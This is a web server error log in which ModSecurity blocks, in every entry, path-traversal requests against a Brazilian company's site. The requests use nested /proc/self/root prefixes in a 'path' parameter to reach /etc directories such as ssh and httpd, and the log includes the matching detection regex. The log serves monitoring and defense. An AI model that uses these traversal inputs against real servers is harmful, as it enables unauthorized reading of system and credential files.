[Wed Mar 18 09:09:54.724054 2026] [:error] [pid 29882:tid 140411708356352] [client 74.7.241.31:35898] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWEkzinOy1jxa1j4cDmgAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:09:56.444379 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.241.31:35914] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWEwkwaGbbGflqUZAAQAAAAM4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:09:59.979364 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.241.31:53012] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWF_u8EFLIOrSqIpv0tgAAAks"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:10:01.360750 2026] [:error] [pid 17887:tid 140411674785536] [client 74.7.241.31:53022] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWGQkwaGbbGflqUZAAQgAAAMg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:10:06.316447 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.241.31:53028] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWHsdf6f5d65gmYZTEVAAAAtA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:10:07.624373 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.241.31:40472] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWH-yqAr6etmhZHNquHgAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:10:11.583391 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.241.31:40474] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWI-yqAr6etmhZHNquIgAAAEE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:10:12.951185 2026] [:error] [pid 15051:tid 140411649607424] [client 74.7.241.31:40484] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWJCmAPhZkrhU8w4ldIwAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:10:14.251202 2026] [:error] [pid 17887:tid 140411725141760] [client 74.7.241.31:40494] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWJgkwaGbbGflqUZAASgAAAMI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:10:17.650038 2026] [:error] [pid 29882:tid 140411658000128] [client 74.7.241.31:40506] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWKUzinOy1jxa1j4cDqwAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:10:19.054121 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.241.31:43050] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWK_u8EFLIOrSqIpv0vgAAAkc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:10:19.918973 2026] [:error] [pid 31803:tid 140411624429312] [client 216.73.216.191:26993] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWK-yqAr6etmhZHNquKwAAAE4"]
[Wed Mar 18 09:10:21.435050 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.241.31:43062] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWLQkwaGbbGflqUZAAUAAAAMs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:10:23.784115 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.241.31:43078] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWL_u8EFLIOrSqIpv0wAAAAlU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:10:24.511027 2026] [:error] [pid 15051:tid 140411699963648] [client 74.7.243.128:33022] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWMCmAPhZkrhU8w4ldMwAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:10:25.055225 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.241.31:43082] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWMdY0UrI5A3LftIySrgAAAYI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:10:25.809619 2026] [:error] [pid 19507:tid 140411658000128] [client 74.7.243.128:40130] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWMdY0UrI5A3LftIySsgAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:10:27.400829 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.241.31:43096] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWM9a6ubjKNq_cu4aIZQAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:10:31.805632 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.241.31:59662] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWN9a6ubjKNq_cu4aIagAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:10:34.782424 2026] [:error] [pid 17887:tid 140411674785536] [client 74.7.243.128:40136] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWOQkwaGbbGflqUZAAYwAAAMg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:10:38.682089 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.241.31:59674] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWPsdf6f5d65gmYZTEaAAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:10:39.987295 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.241.31:51090] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWP9a6ubjKNq_cu4aIcwAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:10:42.843219 2026] [:error] [pid 30077:tid 140411616036608] [client 74.7.241.31:51102] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWQvu8EFLIOrSqIpv01gAAAk8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
